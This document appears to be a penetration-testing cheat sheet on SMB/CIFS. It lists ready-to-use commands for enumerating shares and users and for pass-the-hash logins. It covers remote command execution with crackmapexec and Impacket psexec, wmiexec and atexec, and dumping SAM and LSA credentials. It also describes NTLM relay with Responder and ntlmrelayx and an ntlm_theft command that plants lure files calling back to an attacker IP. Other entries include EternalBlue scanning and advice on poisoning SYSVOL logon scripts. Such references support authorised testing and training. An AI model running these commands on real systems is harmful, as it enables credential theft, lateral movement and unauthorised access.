Skip to main content
SMB (Server Message Blocks) / CIFS (Common Internet File System) is a client-server protocol for shared access to files, printers, and other network resources. Port 445 is SMB over IP; Port 139 is NetBIOS over TCP.

Server Enumeration

# Scan network for SMB hosts
nbtscan -r 192.168.0.1/24

# SMB version
msf> use auxiliary/scanner/smb/smb_version

# Comprehensive enumeration
enum4linux -a <IP>
enum4linux-ng -A <IP>
nmap --script "safe or smb-enum-*" -p 445 <IP>

Null Session Enumeration

smbclient --no-pass -L //<IP>      # List shares (null user)
smbmap -H <IP>                      # Null user
smbmap -H <IP> -u null -p null
crackmapexec smb <IP> -u '' -p '' --shares

Authenticated Enumeration

smbmap -u "username" -p "password" -H <IP>
smbmap -u "username" -p "<NT>:<LM>" -H <IP>   # Pass-the-Hash

crackmapexec smb <IP> -u 'username' -p 'password' --shares
crackmapexec smb <IP> -u 'username' -H '<HASH>' --shares

# Full enum
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'pass' --users
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'pass' --groups
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'pass' --sessions
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'pass' --loggedon-users

RPC Enumeration

# Connect (null session)
rpcclient -U "" -N <IP>

# With credentials
rpcclient -U "username%passwd" <IP>

# Useful RPC commands
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> queryuser <RID>
rpcclient $> querydispinfo

Share Operations

# Connect to share
smbclient --no-pass //<IP>/<Share>
smbclient -U 'username%passwd' //<IP>/<Share>

# Recursive list
smbclient --no-pass -c 'recurse;ls' //<IP>/<Share>
smbmap -R -u "username" -p "password" -H <IP>

# Download all files
smbclient //<IP>/<share>
> mask ""
> recurse
> prompt
> mget *

# Mount share
mount -t cifs //x.x.x.x/share /mnt/share
mount -t cifs -o "username=user,password=pass" //x.x.x.x/share /mnt/share

Common Windows Share Names

C$, D$, ADMIN$, IPC$, PRINT$, FAX$, SYSVOL, NETLOGON

Enumerate Users via Lookupsid / RID Brute Force

lookupsid.py -no-pass hostname.local

# One-liner
for i in $(seq 500 1100); do \
  rpcclient -N -U "" 10.10.10.10 -c "queryuser 0x$(printf '%x\n' $i)" \
  | grep "User Name\|user_rid\|group_rid" && echo ""; \
done

Kerberos Authentication

smbclient --kerberos //ws01win10.domain.com/C$
rpcclient -k ws01win10.domain.com

# NetExec with Kerberos
sudo ntpdate <dc.fqdn>           # Sync time
netexec smb <dc.fqdn> -k

Command Execution

# crackmapexec (multiple methods)
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
crackmapexec smb 192.168.10.11 -u Administrator -H <NTHASH> -x whoami
# Methods: --exec-method {mmcexec,smbexec,atexec,wmiexec}

# psexec.py (Impacket)
./psexec.py [[domain/]username[:password]@]<target>
./psexec.py -hashes <LM:NT> [email protected]

# wmiexec.py (Impacket)
./wmiexec.py [[domain/]username[:password]@]<target>
./wmiexec.py -hashes LM:NT [email protected]

# atexec.py - Task Scheduler
./atexec.py [[domain/]username[:password]@]<target> "command"

SAM and LSASS Dumping

crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --sam
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --lsa

SYSVOL Share Exploitation

The SYSVOL share is readable by all authenticated domain users. It often contains batch, VBScript, and PowerShell scripts with credentials. If writable, you can poison logon scripts for RCE at user logon.
# Check writability
smbclient //<DC>/SYSVOL -U 'DOMAIN\user%pass'
> ls
# Try uploading a small file to test write permissions

SMB Relay Attack

# Requires Responder for capture
responder -I eth0 -wrf

# Then relay captured hash to target
ntlmrelayx.py -tf targets.txt -smb2support

# See more: spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks

NTLM Theft

# Plant malicious files to trigger NTLM auth
# ntlm_theft generates SCF, LNK, DOC, PDF files
python3 ntlm_theft.py -g all -s <attacker_ip> -f loot

ShareHound (BloodHound SMB Collector)

sharehound -ai "10.0.100.201" -au "user" -ap "Test123!" \
  -ns "10.0.100.201" -rf "rules/skip_common_shares.shareql"

# BloodHound queries for interesting share access
# Find principals with write access on shares:
# MATCH x=(p)-[r:CanWriteDacl|CanWriteOwner|CanDsWriteProperty]->(s:NetworkShareSMB) RETURN x

SMB Version Vulnerabilities

# Check for EternalBlue (MS17-010)
nmap -p 139,445 -vv -Pn --script=smb-vuln-ms17-010 <IP>
nmap -p 139,445 --script 'smb-vuln*' -Pn <IP>

# MSF
msf> search type:exploit platform:windows target:2008 smb

Post-Exploitation: Samba Config

# Default config location
/etc/samba/smb.conf

# Check active connections
smbstatus
Dangerous Samba settings:
  • guest ok = yes — allow unauthenticated access
  • writable = yes + create mask = 0777 — world-writable shares
  • logon script = script.sh — execute scripts on login

Build docs developers (and LLMs) love

Get started for freeTalk to us